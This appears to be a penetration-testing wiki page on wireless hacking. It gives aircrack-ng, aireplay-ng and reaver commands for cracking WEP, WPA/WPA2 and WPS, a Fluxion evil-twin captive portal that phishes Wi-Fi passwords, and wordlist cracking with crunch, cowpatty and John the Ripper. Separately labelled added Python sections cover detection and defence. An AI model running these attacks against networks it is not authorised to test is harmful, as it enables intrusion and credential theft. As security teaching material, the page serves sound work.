Pentest Wireless Hacking

From Batserver Wiki

Hardware

I personally use either of two items that I carry around in my hacker's tool-belt.

ALFA Network card AWUS036NH - 802.11 b/g/n Long-Range, approx. £30 / $50

TP-LINK TL-WN722N - 150 Mbps High-gain, approx. £12 / $20


Attacking

WEP

Configure Interface:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac aa:bb:cc:dd:ee:ff wlan0
airmon-ng start wlan0

Scan for networks:

airodump-ng mon0

Target AP:

airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0

Attack:

aireplay-ng -1 0 -a (bssid) -h aa:bb:cc:dd:ee:ff -e (essid) mon0   # fake authentication; use the monitor interface airmon-ng created, not wlan0
aireplay-ng -3 -b (bssid) -h aa:bb:cc:dd:ee:ff mon0               # ARP request replay to generate IVs
(the #Data column in airodump-ng needs to pass roughly 10,000 captured IVs before cracking will succeed)

Cracking:

aircrack-ng -b (bssid) (file_name-01.cap)


WPA/2

Configure Interface:

ifconfig wlan0 down
airmon-ng stop wlan0
macchanger --mac=aa:bb:cc:dd:ee:ff wlan0
airmon-ng start wlan0

Scan for networks:

airodump-ng mon0   # scan on the monitor interface airmon-ng created

Choose your target and then:

airodump-ng --channel 6 -w Desktop/CapFileName mon0   # writes Desktop/CapFileName-01.cap

Attack using AP MAC and Client MAC:

aireplay-ng -0 10 -a 00:1D:AA:30:6A:F9 --ignore-negative-one mon0
aircrack-ng -w ~/Desktop/Wordlist/CRACKED_PASS.dic /root/Desktop/CapFileName-01.cap   # airodump-ng appends the -01.cap suffix
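An added detection-side example, written for this page rather than taken from it: a sliding-window counter that flags the deauthentication burst the aireplay-ng -0 step above generates, run over constructed frame records. The record field names (ts, subtype, bssid, dst) are assumptions about whatever capture decoder feeds it; 802.11w management frame protection is the real fix where APs and clients support it, and alerting on bursts like this is the fallback.

```python
# Added detection example (not from the wiki): flag a deauthentication burst
# such as the one "aireplay-ng -0 10" produces. Input is a list of already
# decoded management-frame records sorted by time; field names are assumptions.
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12     # 802.11 management frame subtype: Deauthentication
WINDOW_SECONDS = 2.0    # sliding window length
THRESHOLD = 8           # deauths per (bssid, dst) inside the window = flood

def detect_deauth_floods(frames, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return (bssid, dst, first_ts, count) for every (bssid, dst) pair that
    saw at least `threshold` deauth frames inside any `window`-second span.
    frames: iterable of dicts with keys ts, subtype, bssid, dst, sorted by ts."""
    recent = defaultdict(deque)
    alerts = {}
    for f in frames:
        if f["subtype"] != DEAUTH_SUBTYPE:
            continue
        key = (f["bssid"].lower(), f["dst"].lower())
        q = recent[key]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = (key[0], key[1], q[0], len(q))
    return list(alerts.values())

# Constructed sample: ten broadcast deauths from one BSSID in half a second
# (the "-0 10" pattern), one lone deauth from another AP, and a beacon.
SAMPLE_FRAMES = (
    [{"ts": 100.0 + i * 0.05, "subtype": 12,
      "bssid": "00:1D:AA:30:6A:F9", "dst": "ff:ff:ff:ff:ff:ff"} for i in range(10)]
    + [{"ts": 101.0, "subtype": 12, "bssid": "7c:4c:a5:77:52:b9", "dst": "aa:bb:cc:dd:ee:ff"}]
    + [{"ts": 101.5, "subtype": 8, "bssid": "7c:4c:a5:77:52:b9", "dst": "ff:ff:ff:ff:ff:ff"}]
)

if __name__ == "__main__":
    for bssid, dst, first, n in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood: {n} frames from {bssid} to {dst} starting at t={first}")
```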


WPS

$ wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
7C:4C:A5:77:52:B9       1            00        1.0               No                SKYDFA47
E4:F4:C6:79:99:20       6            00        1.0               Yes               leonteale-2Ghz
$ reaver -i mon0 -b E4:F4:C6:79:99:20 -c 6 -f -e leonteale-2Ghz -a -S -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from E4:F4:C6:79:99:20
[+] Associated with E4:F4:C6:79:99:20 (ESSID: leonteale-2Ghz)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
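An added example, not part of the wiki or of wash: a parser for the wash table shown above that reports which access points advertise WPS and are not locked. From the AP owner's side that is the audit list; WPS should be disabled on every entry, since a "WPS Locked: Yes" flag plus the rate limiting reaver reports above is the only thing the AP itself does about PIN guessing. The row layout is taken from the quoted wash 1.4 output.

```python
# Added example (not from the wiki): parse "wash -i mon0" output and list the
# access points whose WPS registrar is still unlocked. Row layout from wash 1.4:
# BSSID, channel, RSSI, WPS version, locked flag, ESSID (ESSID may contain spaces).
import re
from dataclasses import dataclass

@dataclass
class WpsEntry:
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    locked: bool
    essid: str

_ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<channel>\d+)\s+(?P<rssi>-?\d+)\s+(?P<ver>\d+\.\d+)\s+"
    r"(?P<locked>Yes|No)\s+(?P<essid>.*?)\s*$"
)

def parse_wash(output):
    """Return one WpsEntry per data row; banner, header and rule lines are skipped."""
    entries = []
    for line in output.splitlines():
        m = _ROW.match(line.strip())
        if m:
            entries.append(WpsEntry(m["bssid"].upper(), int(m["channel"]), int(m["rssi"]),
                                    m["ver"], m["locked"] == "Yes", m["essid"]))
    return entries

def unlocked_wps(entries):
    """Entries that advertise WPS and have not locked the registrar."""
    return [e for e in entries if not e.locked]

# The wash output quoted above, embedded so the script runs offline.
WASH_OUTPUT = """\
Wash v1.4 WiFi Protected Setup Scan Tool

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
7C:4C:A5:77:52:B9       1            00        1.0               No                SKYDFA47
E4:F4:C6:79:99:20       6            00        1.0               Yes               leonteale-2Ghz
"""

if __name__ == "__main__":
    for e in unlocked_wps(parse_wash(WASH_OUTPUT)):
        print(f"WPS unlocked: {e.essid} ({e.bssid}) channel {e.channel}, disable WPS here")
```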

Social Engineering

Fluxion

Github Fluxion

Fluxion is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. It is compatible with the latest release of Kali (rolling). If you are new, or just don't understand much about the project, have a look at the wiki. The attack is mostly manual, but experimental versions will automatically handle most functionality from the stable releases.

Install

  git clone https://github.com/deltaxflux/fluxion

How it works

   Scan the networks.
   Capture a handshake (the attack cannot be used without a valid handshake; it is needed to verify the password).
   Use the web interface. *
   Launch a FakeAP instance to imitate the original access point.
   Spawn an MDK3 process, which deauthenticates all users connected to the target network, so they can be lured into connecting to the FakeAP and entering the WPA password.
   Launch a fake DNS server to capture all DNS requests and redirect them to the host running the script.
   Launch a captive portal to serve a page which prompts the user to enter their WPA password.
   Each submitted password is verified against the handshake captured earlier.
   The attack terminates automatically as soon as a correct password is submitted.
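An added defender-side example, not part of Fluxion or of the wiki: the FakeAP step above is an evil twin, an AP broadcasting your ESSID from a BSSID you do not own, and a captive-portal twin is typically an open network. The check below compares observed beacons against an inventory of the APs you actually run and flags both an unknown BSSID and a security downgrade. The inventory, the Beacon record shape and the sample beacons are constructed for this example.

```python
# Added example (not from Fluxion or the wiki): spot an access point that
# imitates one of ours, from the defender's side, by comparing beacons with a
# known inventory. Inventory and beacons are constructed; privacy labels follow
# the airodump-ng ENC column (WPA2, WPA, WEP, OPN).
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    bssid: str
    essid: str
    channel: int
    privacy: str

# Known estate: ESSID -> legitimate BSSIDs and the security each network runs.
INVENTORY = {
    "leonteale-2Ghz": {"bssids": {"E4:F4:C6:79:99:20"}, "privacy": "WPA2"},
}

def find_rogue_aps(beacons, inventory=INVENTORY):
    """Return (beacon, reason) for every beacon that claims one of our ESSIDs
    but does not match the inventory: an unknown BSSID (evil twin) or a weaker
    security setting than we run (downgrade to lure clients onto a portal)."""
    findings = []
    for b in beacons:
        known = inventory.get(b.essid)
        if known is None:
            continue                      # not one of our networks, out of scope
        if b.bssid.upper() not in known["bssids"]:
            findings.append((b, "unknown BSSID advertising our ESSID"))
        elif b.privacy != known["privacy"]:
            findings.append((b, f"security {b.privacy} instead of {known['privacy']}"))
    return findings

# Constructed sample: the real AP, an open twin on the same ESSID from another
# BSSID (the captive-portal pattern), and an unrelated neighbour network.
SAMPLE_BEACONS = [
    Beacon("E4:F4:C6:79:99:20", "leonteale-2Ghz", 6, "WPA2"),
    Beacon("02:11:22:33:44:55", "leonteale-2Ghz", 6, "OPN"),
    Beacon("7C:4C:A5:77:52:B9", "SKYDFA47", 1, "WPA2"),
]

if __name__ == "__main__":
    for beacon, reason in find_rogue_aps(SAMPLE_BEACONS):
        print(f"ROGUE {beacon.bssid} '{beacon.essid}' ch{beacon.channel}: {reason}")
```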

Requirements

A Linux-based operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling. Kali 2 & 2016 support the latest aircrack-ng versions. An external wifi card is recommended.

Cracking

Crunch

crunch 8 8 1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ -t 97KQA@@@ | aircrack-ng -b 78:54:2E:28:E7:86 -w - thehak-01.cap

Passgen

Passgen is a simple Python alternative to the random character generator Crunch. It aims at cracking WPA/WPA2 keys by randomizing the output, as opposed to generating a sequential list (aaaaaaaa, aaaaaaab, aaaaaaac, etc.).

Example usage with aircrack-ng:

python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w - WiFi.cap

Some other options are:

   The Associative Word List Generator (AWLG) – Wordlists for Password Cracking
   CeWL – Custom Word List Generator Tool for Password Cracking
   RSMangler – Keyword Based Wordlist Generator For Bruteforcing
   CUPP – Common User Passwords Profiler – Automated Password Profiling Tool

Of course John the Ripper (JTR) has some built-in options for creating permutations from wordlists.

Cowpatty

$ ./cowpatty -r eap-test.dump -f dict -s somethingclever
coWPAtty 2.0 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against passphrase.
Loading words into memory, please be patient ... Done (10201 words).
Starting dictionary attack.  Please be patient.
[1000] [2000] [3000] [4000] 
The PSK is "family movie night".

4087 passphrases tested in 59.05 seconds:  69.22 passphrases/second

This tool can also accept dictionary words from STDIN, allowing us to utilize a tool such as John the Ripper to create lots of word permutations from a dictionary file:

$ john -wordfile:dictfile -rules -session:johnrestore.dat -stdout:63 | cowpatty -r eap-test.dump -f - -s somethingclever

In the default configuration of John the Ripper, common permutations of dictionary words will be sent as potential passwords to coWPAtty. For example, here is a list of the words John will create from the input word "password":

$ echo password >word
$ john -session:/tmp/delme -wordfile:word -rules -stdout

password
Password
passwords
password1
Password1
drowssap
1password
PASSWORD
password2
password!
password3
password7
password9
password5
password4
password8
password6
password0
password.
password?
psswrd
drowssaP
Drowssap
passworD
2password
4password
Password2
Password!
Password3
Password9
Password5
Password7
Password4
Password6
Password8
Password.
Password?
Password0
3password
7password
9password
5password
6password
8password
Passwords
passworded
passwording
Passworded
Passwording
words: 49  time: 0:00:00:00 100%  w/s: 49.00  current: Passwording

John the Ripper is available at http://www.openwall.com/john/
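An added policy-side example, not part of the wiki or of John the Ripper: the 49 permutations above are what a wordlist attack gets for free, so a WPA passphrase that is a dictionary word under that kind of mangling (case change, reversal, a leading or trailing digit or punctuation mark, a plural or -ed/-ing suffix, dropped vowels) should be rejected when the PSK is set. The function undoes those manglings and checks the result against a dictionary; the sample dictionary and the 12-character minimum are constructed for this example.

```python
# Added example (not from the wiki or John): reject a WPA passphrase that is a
# simple mangling of a dictionary word, the kind John's default rules emit.
import string

_TRAILERS = set(string.digits + string.punctuation)
_SUFFIXES = ("ing", "ed", "s")

def _strip_vowels(word):
    return "".join(c for c in word if c not in "aeiou")

def _candidates(passphrase):
    """Every base form the passphrase could have been mangled from."""
    base = passphrase.lower()
    forms = {base, base[::-1]}                       # case change, reversal
    if base and base[0] in _TRAILERS:
        forms.add(base[1:])                          # leading digit/punctuation
    if base and base[-1] in _TRAILERS:
        forms.add(base[:-1])                         # trailing digit/punctuation
    for f in list(forms):
        for suf in _SUFFIXES:                        # plural, -ed, -ing
            if f.endswith(suf) and len(f) > len(suf):
                forms.add(f[: -len(suf)])
    return forms

def mangled_from(passphrase, dictionary):
    """Return the dictionary word the passphrase is a simple mangling of, or
    None if there is none. Vowel-stripped forms (psswrd) are matched too."""
    words = {w.lower() for w in dictionary}
    devoweled = {_strip_vowels(w): w for w in words}
    for form in _candidates(passphrase):
        if form in words:
            return form
        if form in devoweled:
            return devoweled[form]
    return None

def is_weak_psk(passphrase, dictionary, min_length=12):
    """Policy check: too short, or a mangled dictionary word, is rejected."""
    return len(passphrase) < min_length or mangled_from(passphrase, dictionary) is not None

# Constructed dictionary: a few words a target-specific wordlist would hold.
SAMPLE_DICT = ["password", "family", "movie", "night", "leonteale"]

if __name__ == "__main__":
    for candidate in ("Passwording", "psswrd", "purple-kettle-orbit-42"):
        print(candidate, "->", "weak" if is_weak_psk(candidate, SAMPLE_DICT) else "ok")
```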